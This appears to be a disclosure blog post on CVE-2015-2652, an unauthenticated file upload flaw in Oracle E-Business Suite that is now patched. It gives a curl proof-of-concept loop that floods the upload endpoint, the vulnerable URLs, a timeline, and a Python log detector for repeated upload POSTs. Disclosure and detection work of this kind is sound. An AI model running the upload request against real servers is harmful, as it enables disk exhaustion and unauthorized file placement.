During a routine penetration testing engagement, I uncovered an interesting 0-day vulnerability: an unauthenticated file upload in Oracle E-Business Suite. This upload bug can easily be used to place files on the web server, and an attacker can also flood the server's hard disk, which makes the vulnerability straightforward to leverage remotely.
Oracle released a Critical Patch Update containing security fixes for Oracle E-Business Suite. This vulnerability is remotely exploitable without any authentication, i.e. it can be exploited over the network without valid user credentials.
Introduction
Oracle E-Business Suite is a fully integrated, comprehensive suite of business applications for the enterprise. Most organizations use Oracle E-Business Suite for the following purposes:
- Customer Relationship Management
- Financial Management
- Human Capital Management
- Project Portfolio Management
- Advanced Procurement
- Supply Chain Management
- Service Management
Vulnerable Version
Oracle E-Business Suite, version(s) 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4
Brief About the Bug
The unauthenticated upload vulnerability resides in the Oracle Marketing component. A Google search for Oracle E-Business returns more than 30K unique results.
The file is uploaded into a table in the E-Business Suite database schema; the attacker, however, can use this to fill up the existing tablespace. The upload functionality allows the attacker to upload arbitrary file types (all executables) and also allows the uploaded code to be executed.
POC raw code for feeding files to the server:
for ($x=1; $x < 100; $x++):
curl -i -s -k -X 'POST' \
-H 'Origin: http://Oracle-Application:Port' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36' -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywS9xiTn7rP23Fori' -H 'Referer: http://Oracle-Application:Port/OA_HTML/amsImageSelect.jsp' \
-b 'JSESSIONID=6e66b3f234234234272c18909d2bca0c96bf7c.kdsnfksjdfn34rk32; PROD_pses=PROD%3DHcqumhXKzuUX0xNEIjoeFKu8hZ%7E; PROD=HcqumhXKzuUX0xNEIjoeFKu8hZ; oracle.uix=0^^GMT+4:00^p' \
--data-binary $'------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"type\"\x0d\x0a\x0d\x0aF\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"FileInput\"; filename=\"Check.txt\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"fileId\"\x0d\x0a\x0d\x0anull\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"url\"\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori--\x0d\x0a' \
'http://Oracle-Application:Port//OA_HTML/amsImageUpload.jsp?dummy=1&jttst0=6_22646%2C22646%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG01DFBB7BC079CDE282F4716CF2E5B140454CA599F18AD7A2CAD711D30D5FB60DF18438A1D10EB7BD7CF1370CF9D979BDA7&oas=ddrqZePQ82zVbJrUIG7jrw..&JSSetFunctionName=null&elemName=null'
end for;
Vulnerability Information
An attacker can use the following URLs to upload files to the server:
http://ORACLE-WebServer:Port/OA_HTML/amsImageSelect.jsp
http://ORACLE-WebServer:Port/OA_HTML/amsImageUpload.jsp
For security reasons we are not releasing the uploaded file path.
Timeline
May 7, 2015 : Identification of the vulnerability
May 8, 2015 : Reported to the Oracle Security Team
May 12, 2015 : Confirmed Upload Vulnerability in Oracle E-business
May 22, 2015 : Upload Vulnerability Patched
May 22, 2015 : CPU Scheduled for Critical Update
July 13, 2015 : CVE Allocated CVE-2015-2652
July 14, 2015 : Critical Update Pushed
July 15, 2015 : Vulnerability Made Public
Mitigation
Update Oracle E-Business Suite to the latest version (the fix shipped in the July 2015 Critical Patch Update).
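Until the patch is applied, the two endpoints named above (amsImageSelect.jsp and amsImageUpload.jsp) are worth watching in the HTTP server access log: a single source repeating POSTs to the upload handler is the tablespace-flooding pattern described in this post. The following detector is an added example written for this article, not code from the original post or from Oracle; it assumes Combined Log Format access logs, a threshold of 10 POSTs per source (a hypothetical value to tune per environment), and runs on constructed sample lines. It only counts requests to the endpoint; whether a session was authenticated is not visible in an access log, so any sustained POST activity to the upload handler from one source should be reviewed.

```python
import re
from collections import Counter

# Combined Log Format as written by Apache / Oracle HTTP Server.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Upload handler named in the advisory, normalised to lower case.
UPLOAD_ENDPOINTS = {"/oa_html/amsimageupload.jsp"}


def parse_line(line):
    """Parse one access-log line; return a dict or None if it does not match."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    # Drop the query string and collapse repeated slashes so that
    # "//OA_HTML/amsImageUpload.jsp?dummy=1" (as in the POC request)
    # and "/OA_HTML/amsImageUpload.jsp" compare equal.
    path = entry["target"].split("?", 1)[0]
    entry["path"] = re.sub(r"/{2,}", "/", path).lower()
    return entry


def is_upload_post(entry):
    """True for a POST to the image upload handler, regardless of query string."""
    return entry["method"] == "POST" and entry["path"] in UPLOAD_ENDPOINTS


def upload_posts_by_ip(lines):
    """Count upload POSTs per client address over an iterable of log lines."""
    counts = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry and is_upload_post(entry):
            counts[entry["ip"]] += 1
    return counts


def find_upload_bursts(lines, threshold=10):
    """Return {ip: count} for sources at or above the per-source POST threshold.

    The threshold is a hypothetical starting point, not a value from the advisory.
    """
    return {ip: n for ip, n in upload_posts_by_ip(lines).items() if n >= threshold}


def constructed_sample_log():
    """Constructed sample traffic (not real logs): one browsing user who
    uploads once, one scripted source repeating the upload POST, and noise."""
    ts = "14/Jul/2015:10:00:%02d +0000"
    lines = [
        '10.0.0.5 - - [%s] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"' % (ts % 0),
        '10.0.0.5 - - [%s] "GET /OA_HTML/amsImageSelect.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"' % (ts % 1),
        '10.0.0.5 - - [%s] "POST /OA_HTML/amsImageUpload.jsp?dummy=1 HTTP/1.1" 200 312 '
        '"http://ebs.example/OA_HTML/amsImageSelect.jsp" "Mozilla/5.0"' % (ts % 2),
    ]
    for i in range(12):
        lines.append(
            '198.51.100.7 - - [%s] "POST //OA_HTML/amsImageUpload.jsp?dummy=1 HTTP/1.1" 200 312 '
            '"-" "curl/7.43.0"' % (ts % (3 + i))
        )
    # A GET to the handler is not an upload and must not be counted.
    lines.append('10.0.0.9 - - [%s] "GET /OA_HTML/amsImageUpload.jsp HTTP/1.1" 403 0 "-" "Mozilla/5.0"' % (ts % 20))
    return lines


if __name__ == "__main__":
    sample = constructed_sample_log()
    for ip, n in find_upload_bursts(sample).items():
        print("ALERT: %s sent %d POSTs to the image upload handler" % (ip, n))
```

Run it against a real log by replacing the constructed lines with a file iterator; lowering the threshold to 1 lists every source that has used the upload handler at all, which is a useful inventory when deciding whether the endpoint is needed in your deployment.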
Oracle vulnerability reference and vulnerability credit: Oracle Critical Patch Update Advisory – July 2015